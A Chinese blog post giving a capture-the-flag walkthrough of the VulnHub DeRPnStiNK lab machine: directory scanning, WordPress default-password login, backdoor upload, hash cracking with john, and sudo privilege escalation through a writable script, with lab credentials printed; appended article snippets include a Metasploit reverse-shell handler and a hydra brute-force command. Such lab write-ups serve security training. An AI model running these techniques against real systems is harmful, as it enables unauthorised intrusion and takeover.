【Vulnhub】Vulnhub2018-DeRPnStiNK

最新推荐文章于 2025-12-12 15:13:36 发布
原创 最新推荐文章于 2025-12-12 15:13:36 发布 · 236 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #网络安全

信息收集

在这里插入图片描述
开了三个端口21,22,80
访问80端口,flag1在源码下
在这里插入图片描述
没什么东西就扫描目录
在这里插入图片描述

几个有用的
http://192.168.83.154/php/phpmyadmin/
http://192.168.83.154/weblog/
http://192.168.83.154/weblog/wp-admin/----弱口令爆破 admin admin

在这里插入图片描述
对文件上传没有过滤,上传一个后门

在这里插入图片描述
配置文件,还有一个phpmyadmin没登陆
在这里插入图片描述
在这里插入图片描述

root mysql

在这里插入图片描述
flag2
在这里插入图片描述

unclestinky $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
用john爆破  wedgie57

在这里插入图片描述
再次登录wordpress没发现啥,前面用web打入服务器了,先用那个,有两个用户,尝试用之前的密码登录一下
在这里插入图片描述

stinky wedgie57

flag3
在这里插入图片描述
尝试用stinky wedgie57登录ftp

mv derpissues.pcap ~/ftp/files/---移动到ftp目录下

发现了sshkey

在这里插入图片描述
用xshell连接。然后对derpissues.pacp进行分析

mrderp:"derpderpderpderpderpderpderp"

在这里插入图片描述

mrderp@DeRPnStiNK:~/Desktop$ cat helpdesk.log
From: Help Desk helpdesk@derpnstink.local
Date: Thu, Aug 23, 2017 at 1:29 PM
Subject: sudoers ISSUE=242 PROJ=26
To: Derp, Mr (mrderp) [C]
When replying, type your text above this line.
Help Desk Ticket Notification
Thank you for contacting the Help Desk. Your ticket information is below. If you have any
additional information to add to this ticket, please reply to this notification.
If you need immediate help (i.e. you are within two days of a deadline or in the event of a
security emergency), call us. Note that the Help Desk’s busiest hours are between 10 a.m. (ET)
and 3 p.m. (ET).
Toll-free: 1-866-504-9552
Phone: 301-402-7469
TTY: 301-451-5939
Ticket Title: Sudoers File issues
Ticket Number: 242
Status: Break/fix
Date Created: 08/23/2017
Latest Update Date: 08/23/2017
Contact Name: Mr Derp
CC’s: Uncle Stinky
Full description and latest notes on your Ticket: Sudoers File issues
Notification
Regards,
Service Desk
Listen with focus, answer with accuracy, assist with compassion.
From: Help Desk
Date: Mon, Sep 10, 2017 at 2:53 PM
Subject: sudoers ISSUE=242 PROJ=26
To: Derp, Mr (mrderp) [C]
When replying, type your text above this line.
Closed Ticket Notification
Thank you for contacting the Help Desk. Your ticket information and its resolution is
below. If you feel that the ticket has not been resolved to your satisfaction or you need additional
assistance, please reply to this notification to provide additional information.
If you need immediate help (i.e. you are within two days of a deadline or in the event of a
security emergency), call us or visit our Self Help Web page at https://pastebin.com/RzK9WfGw
Note that the Help Desk’s busiest hours are between 10 a.m. (ET)
and 3 p.m. (ET).
Toll-free: 1-866-504-9552
Phone: 301-402-7469
TTY: 301-451-5939
Ticket Title: sudoers issues
Ticket Number: 242
Status: Closed
Date Created: 09/10/2017
Latest Update Date: 09/10/2017
CC’s:
Resolution: Closing ticket. ticket notification.
Regards,
eRA Service Desk
Listen with focus, answer with accuracy, assist with compassion.
For more information, dont forget to visit the Self Help Web page!!!

没啥用,看看有什么root权限的文件

sudo -l

在这里插入图片描述
没有这个文件,直接运行

echo “/bin/bash” > /home/mrderp/binaries/derpy.sh
chmod +x derpy.sh
sudo ./derpy.sh

然后就是root权限
在这里插入图片描述

逢星
关注
Vulnhub靶场篇:VulnHub2018_DeRPnStiNK
夜车星繁的博客
05-13 1481
靶场难度:中下难度 VMWARE虚拟机下搭建环境: 攻击机kali IP:192.168.223.136 攻击机win10:本机 靶 机IP:192.168.223.141 首先进行信息收集:
VulnHub-DerpNStink:1渗透学习
我是小小白的博客
07-13 1172
前言 靶机地址:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova 靶机难度:中级(CTF) 靶机发布日期:2018 年 2 月 9日 靶机描述:Derp 先生和 Stinky 叔叔是两位正在创办自己的公司 DerpNStink 的系统管理员。他们没有聘请合格的专业人士来建立他们的 IT 环境,而是决定将他们自己的系统组装在一起,该系统几乎准备好上线...... 目标:得到root权限&找到4个flag文件
No.7-VulnHub-DerpNStink: 1-Walkthrough渗透学习
qq_34801745的博客
01-04 1755
** VulnHub-DerpNStink: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机难度:中级(CTF) 靶机发布日期:2018年2月9日 靶机描述:This is a boot2root Ubuntu based virtual machine. It was tested on VMwar...
vulnhub 靶机VulnHub2018_DeRPnStiNK
2301_79517469的博客
03-02 1789
这里上面的一手命令执行也是很有说法的,这里是从信息收集横向出发,然后不考虑提权的化我们现在是在weblog这里,那就从这里入手,找文件嘛,,从文件里面获取信息,config这种的文件命名敏感度是要有的呀孩子--(其实按照平时要是想要直接在这里提权的话就是在系统指令--find--sudo --su--git这些或者系统本身版本漏洞)--因为我们进本已经能够确定不在docker环境而是真实主机。上面的/home部分的两个用户就是主机的用户,可以使用ssh或者ftp这种登录。
VulnHub2018_DeRPnStiNK靶机
m0_61995767的博客
08-08 1089
VulnHub2018_DeRPnStiNK打靶记录
Vulnhub-DERPNSTINK: 1-靶机渗透学习
嗯嗯呐的博客
11-19 2591
靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机难度:中等(CTF) 靶机描述:这是基于Ubuntu的boot2root虚拟机。它已使用DHCP设置的网络接口在VMware Fusion和VMware Workstation12上进行了测试。它旨在模拟我在OSCP实验室中遇到的一些较早的机器,同时还带有一些较小的曲线球,但是没有什么花哨的。坚持经典的黑客方法,并列举所有内容! 目标:找到所有4个标志,最终将您带到完全root访问权限 作者:嗯嗯呐
Vulnhub靶机:DerpNStink: 1
whoami
09-27 1348
Vulnhub靶机:DerpNStink: 1实战
VulnHub2018_DeRPnStiNK靶机总结
qq_45301512的博客
01-16 983
靶机下载地址:dl=0打开靶机,使用nmap扫描出靶机的ip和开放的所有端口可以看到,靶机开放了21端口,22端口和80端口遇到ftp的21端,我们先尝试ftp匿名登录,用户名anonymous,密码为空,发现无法ftp匿名登录那么我们然后先根据80端口打开网站,从网站入手,不行的话,在考虑ssh的爆破打开网站,并没有发现什么功能点,可以进行漏洞利用,那么开始信息收集,目录爆破一下使用dirb扫描出来,经过查看,发现一个新的网页。
vulnhub靶场】VulnHub2018_DeRPnStiNK靶机提权
qq_46421742的博客
07-27 537
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
VulnhubDeRPnStiNK渗透测试
mandarava的博客
03-08 1173
老规矩,用nmap扫一下。发现端口80、22、21、514。输入命令nmap -T4 -a -v xxx.xxx.xxx.xxx。 Nmap scan report for xxx.xxx.xxx.xxx Host is up (1.2s latency). Not shown: 996 closed ports PORT STATE SERVICE 21/tcp open f...
Vulnhub DeRKnStiNK
zhaji001
01-15 1334
简介 虚拟机下载: https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机: 使用Virtualbox虚拟机导入OVA 攻击机:kali linux  0x001  信息收集 nmap扫描网络找到VM ip地址  nmap -sn 192.168.1.100-254 Nmap scan report for 192.168.1.105 H...
vulnhub:DeRPnStiNK
墨染的博客
10-09 1853
环境搭建 下载虚拟机包文件VMware或VirtualBox打开,配置网络模式为NAT模式。 下载链接:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova hash:949e2f8a7d63fabdc55c675c95efe022 开搞 flag1 首先nmap -sP 192.168.14.1/24一波找一下...
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 8020
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
vulnhub-maEnubox
qq_41810304的博客
02-25 710
下载地址:https://www.vulnhub.com/entry/enubox-mattermost,414/ 前言: 作为小白(后面省略好几个字),文中提到的工具仅用于学习。 Kali:192.168.109.129 目标机:192.168.109.140 信息收集: Udp扫描: 漏洞挖掘: 从nmap扫描结果来看,ftp可以匿名登录,先登录ftp,...
vulnhub(De-ICE S1.100, S1.110)
公众号shadow sock7
01-16 1302
学了两个vulnhub上的box De-ICE S1.100 De-ICE S1.110 非常详细的writeup: http://blog.nullmode.com/blog/2013/10/31/de-ice-s1-dot-100-level-1-a-beginners-guide/
Linux + MySQL + Sysbench 一键部署和压测教程
soft2001525的博客
12-10 682
安装 Sysbench 并验证创建测试数据库sbtest和用户sbtest使用prepare构造数据表使用run进行各种类型压测使用cleanup清理数据分析每秒统计和最终汇总报告。
先立后破:Linux 下“新建管理员 → 验证 → 禁用 root 远程 SSH”的零翻车笔记
最新发布
weixin_45626288的博客
12-12 448
本文提供了一套零风险的Linux服务器安全加固流程,重点解决等保2.0要求的"禁用root远程SSH"需求。通过"先立后破"原则,先创建并验证新管理员账号的sudo权限,再禁用root远程登录,全程保持root会话不断开作为应急通道。关键步骤包括:创建新管理员账号、配置sudo权限、严格测试新账号功能、安全修改sshd配置、保留本地root登录权限等。文章特别强调验证环节的重要性,并提供了快速回滚方案,确保运维人员不会因配置失误导致服务器失联。这套方法适用于Kylin
Linux 基础开发工具(2):gcc 、Makefile 与进度条程序实现
2501_92613722的博客
12-09 700
本文详细介绍了Linux下C/C++开发的核心工具链:首先解析gcc/g++编译器从预处理、编译、汇编到链接的完整编译流程;其次讲解Makefile的自动化构建原理与编写方法,包括单文件和多文件项目的构建规则;最后通过实现基础版和业务适配版两种进度条程序,演示了Linux终端程序的开发技巧。文章系统性地梳理了Linux开发环境搭建、项目构建和特色程序实现的全过程,为开发者提供了完整的入门指导方案。掌握这些基础技能后,开发者可快速开展Linux平台下的C/C++项目开发工作。
vulnhub靶机dc-1
01-11
### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装 为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议 启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段 当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况: ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径 随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧 考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]: ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值